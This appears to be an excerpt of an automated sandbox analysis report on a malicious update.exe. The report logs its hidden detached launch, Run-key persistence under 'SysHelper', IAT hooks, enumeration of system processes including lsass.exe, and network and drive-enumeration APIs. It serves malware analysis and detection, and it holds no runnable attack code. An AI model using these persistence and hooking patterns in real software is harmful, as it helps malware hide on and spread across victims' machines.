Create	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --Service 2040 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40	os_pid = 0x494, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\userinit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	4	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	4	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	2	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	379	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	9	Fn

Module (40)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x773e0000	1	Fn
Load	Psapi.dll	base_address = 0x770c0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x773e0000	12	Fn
Get Handle	mscoree.dll	-	1	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, size = 260	1	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, size = 1024	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x773f4f2b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x773f1252	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x773f4208	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x773f359f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77ad0fcb	8	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77ac9d35	3	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x7741735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32First, address_out = 0x77475cd9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcesses, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcessModules, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleBaseNameW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x770c1544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x770c1408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x770c152c	1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	LPCWSTRszTitle	class_name = LPCWSTRszWindowClass, wndproc_parameter = 0		1	Fn

System (405)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = XDUWTFONO	1	Fn
Sleep	duration = 1 milliseconds (0.001 seconds)	402	Fn
Get Time	type = System Time, time = 2018-11-19 13:57:20 (UTC)	1	Fn
Get Time	type = Ticks, time = 38173	1	Fn

Mutex (1)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}		1	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data

Process #19: update.exe

424

Information	Value
ID	#19
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --Service 1676 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\
Monitor	Start Time: 00:01:52, Reason: Child Process
Unmonitor	End Time: 00:02:29, Reason: Self Terminated
Monitor Duration	00:00:37

OS Process Information

Information	Value
PID	0x7ac
Parent PID	0x68c (c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 5C4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	r	-
pagefile_0x0000000000210000	0x00210000	0x00214fff	Pagefile Backed Memory	rw	-
private_0x0000000000210000	0x00210000	0x0025efff	Private Memory	rw	-
private_0x0000000000280000	0x00280000	0x0028ffff	Private Memory	rw	-
private_0x0000000000290000	0x00290000	0x0037ffff	Private Memory	rw	-
private_0x0000000000290000	0x00290000	0x0030ffff	Private Memory	rw	-
private_0x0000000000340000	0x00340000	0x0037ffff	Private Memory	rw	-
private_0x0000000000380000	0x00380000	0x003fffff	Private Memory	rw	-
update.exe	0x00400000	0x0049afff	Memory Mapped File	rwx	... Region Actions Download Dump
pagefile_0x00000000004a0000	0x004a0000	0x00627fff	Pagefile Backed Memory	r	-
private_0x0000000000680000	0x00680000	0x0077ffff	Private Memory	rw	-
pagefile_0x0000000000780000	0x00780000	0x00900fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000910000	0x00910000	0x01d0ffff	Pagefile Backed Memory	r	-
private_0x0000000001d10000	0x01d10000	0x01ecffff	Private Memory	rw	-
private_0x0000000001d10000	0x01d10000	0x01e8ffff	Private Memory	rw	-
private_0x0000000001ec0000	0x01ec0000	0x01ecffff	Private Memory	rw	-
wow64win.dll	0x73ff0000	0x7404bfff	Memory Mapped File	rwx	-
msvcr100.dll	0x75200000	0x752befff	Memory Mapped File	rwx	-
dnsapi.dll	0x752c0000	0x75303fff	Memory Mapped File	rwx	-
winnsi.dll	0x75310000	0x75316fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x75320000	0x7533bfff	Memory Mapped File	rwx	-
winmm.dll	0x75340000	0x75371fff	Memory Mapped File	rwx	-
mpr.dll	0x75380000	0x75391fff	Memory Mapped File	rwx	-
msimg32.dll	0x753a0000	0x753a4fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x754a0000	0x754a7fff	Memory Mapped File	rwx	-
wow64.dll	0x754b0000	0x754eefff	Memory Mapped File	rwx	-
cryptbase.dll	0x755e0000	0x755ebfff	Memory Mapped File	rwx	-
sspicli.dll	0x755f0000	0x7564ffff	Memory Mapped File	rwx	-
msctf.dll	0x75650000	0x7571bfff	Memory Mapped File	rwx	-
advapi32.dll	0x75720000	0x757bffff	Memory Mapped File	rwx	-
ws2_32.dll	0x757d0000	0x75804fff	Memory Mapped File	rwx	-
ole32.dll	0x75810000	0x7596bfff	Memory Mapped File	rwx	-
msasn1.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
crypt32.dll	0x75980000	0x75a9cfff	Memory Mapped File	rwx	-
usp10.dll	0x75b30000	0x75bccfff	Memory Mapped File	rwx	-
wininet.dll	0x75bd0000	0x75cc4fff	Memory Mapped File	rwx	-
imm32.dll	0x75d30000	0x75d8ffff	Memory Mapped File	rwx	-
msvcrt.dll	0x75d90000	0x75e3bfff	Memory Mapped File	rwx	-
lpk.dll	0x75e40000	0x75e49fff	Memory Mapped File	rwx	-
user32.dll	0x75e50000	0x75f4ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f50000	0x75f95fff	Memory Mapped File	rwx	-
shell32.dll	0x75fa0000	0x76be9fff	Memory Mapped File	rwx	-
iertutil.dll	0x76c40000	0x76e3afff	Memory Mapped File	rwx	-
shlwapi.dll	0x76e40000	0x76e96fff	Memory Mapped File	rwx	-
sechost.dll	0x76ea0000	0x76eb8fff	Memory Mapped File	rwx	-
urlmon.dll	0x76ec0000	0x76ff5fff	Memory Mapped File	rwx	-
oleaut32.dll	0x77000000	0x7708efff	Memory Mapped File	rwx	-
psapi.dll	0x770c0000	0x770c4fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x77150000	0x7723ffff	Memory Mapped File	rwx	-
gdi32.dll	0x77290000	0x7731ffff	Memory Mapped File	rwx	-
kernel32.dll	0x773e0000	0x774effff	Memory Mapped File	rwx	-
private_0x0000000077690000	0x77690000	0x777aefff	Private Memory	rwx	-
private_0x00000000777b0000	0x777b0000	0x778a9fff	Private Memory	rwx	-
ntdll.dll	0x778b0000	0x77a58fff	Memory Mapped File	rwx	-
nsi.dll	0x77a60000	0x77a65fff	Memory Mapped File	rwx	-
ntdll.dll	0x77a90000	0x77c0ffff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
pagefile_0x00000000fffb0000	0xfffb0000	0xfffd2fff	Pagefile Backed Memory	r	-
private_0x00000000fffdb000	0xfffdb000	0xfffddfff	Private Memory	rw	-
private_0x00000000fffde000	0xfffde000	0xfffdefff	Private Memory	rw	-
private_0x00000000fffdf000	0xfffdf000	0xfffdffff	Private Memory	rw	-
private_0x00000000fffe0000	0xfffe0000	0x7fffffeffff	Private Memory	r	-

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x0000000000680000:+0x13677	13. entry of update.exe	4 bytes	kernel32.dll:GetCommProperties+0x0 now points to private_0x0000000000680000:+0x2006a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x13677	14. entry of update.exe	4 bytes	kernel32.dll:GetThreadSelectorEntry+0x0 now points to pagefile_0x0000000000910000:+0x5677e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x13677	18. entry of update.exe	4 bytes	kernel32.dll:GetLastError+0x0 now points to pagefile_0x0000000000010000:+0x25d7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x13677	21. entry of update.exe	4 bytes	kernel32.dll:SetLastError+0x0 now points to private_0x0000000000680000:+0x2006a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x13677	22. entry of update.exe	4 bytes	kernel32.dll:CompareStringW+0x0 now points to pagefile_0x0000000000910000:+0x56c7e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x13677	24. entry of update.exe	4 bytes	kernel32.dll:GetLocaleInfoW+0x0 now points to pagefile_0x0000000000910000:+0x120043	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x13677	26. entry of update.exe	4 bytes	kernel32.dll:GetProcessHeap+0x0 now points to pagefile_0x0000000000010000:+0x25b7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x13677	37. entry of update.exe	4 bytes	kernel32.dll:FreeLibrary+0x0 now points to pagefile_0x0000000000910000:+0x238be8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000680000:+0x13677	64. entry of update.exe	4 bytes	kernel32.dll:MultiByteToWideChar+0x0 now points to pagefile_0x0000000000910000:+0xe28d56	... Actions Go to Installer Region Go to Target Region

Host Behavior

File (6)

Operation	Filename	Additional Information	Count	Logfile
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn

Registry (2)

Operation	Key	Additional Information	Success	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-		1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --AutoStart, type = REG_EXPAND_SZ		1	Fn

Process (71)

Operation	Process	Additional Information	Count	Logfile
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\userinit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	desired_access = SYNCHRONIZE	44	Fn

Module (286)

Operation	Module	Additional Information	Count	Logfile
Load	RPCRT4.dll	base_address = 0x77150000	1	Fn
Load	MPR.dll	base_address = 0x75380000	1	Fn
Load	WININET.dll	base_address = 0x75bd0000	1	Fn
Load	WINMM.dll	base_address = 0x75340000	1	Fn
Load	SHLWAPI.dll	base_address = 0x76e40000	1	Fn
Load	KERNEL32.dll	base_address = 0x773e0000	1	Fn
Load	USER32.dll	base_address = 0x75e50000	1	Fn
Load	ADVAPI32.dll	base_address = 0x75720000	1	Fn
Load	SHELL32.dll	base_address = 0x75fa0000	1	Fn
Load	ole32.dll	base_address = 0x75810000	1	Fn
Load	OLEAUT32.dll	base_address = 0x77000000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x75320000	1	Fn
Load	WS2_32.dll	base_address = 0x757d0000	1	Fn
Load	DNSAPI.dll	base_address = 0x752c0000	1	Fn
Load	msvcr100.dll	base_address = 0x75200000	1	Fn
Load	kernel32.dll	base_address = 0x773e0000	1	Fn
Load	Psapi.dll	base_address = 0x770c0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x773e0000	13	Fn
Get Handle	mscoree.dll	-	1	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, size = 260	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, size = 1024	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x773f4f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x773f1252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x773f4208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x773f359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77ad0fcb	9	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77ac9d35	4	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x7741735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32First, address_out = 0x77475cd9	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x77171635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x77191ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x771cd918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x77193fc5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x7716f48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x75382dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x75382f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x75383058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75bff18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75beb406	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x75bf5c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75beab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x75bf9197	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x75c4be5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x75c130f1	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x753426e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x76e5a1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x76e5bb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x76e7ad1a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x76e581ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x76e53248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x76e4d65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x76e545bf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x7740f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x774134d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x7747425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x773f3da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x7740ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x773f3c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x773f5223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSize, address_out = 0x773f196e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x773f4435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x773f17d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x773f5a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x773f1b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x773f103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x773f4259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x773f1136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x773f5371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x773f186e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x773f1282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x7740ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x773f1986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x773f588e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x773f5063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x773f170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x773f492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x773f10ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x7741830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x773f4620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x7741d556	1	Fn
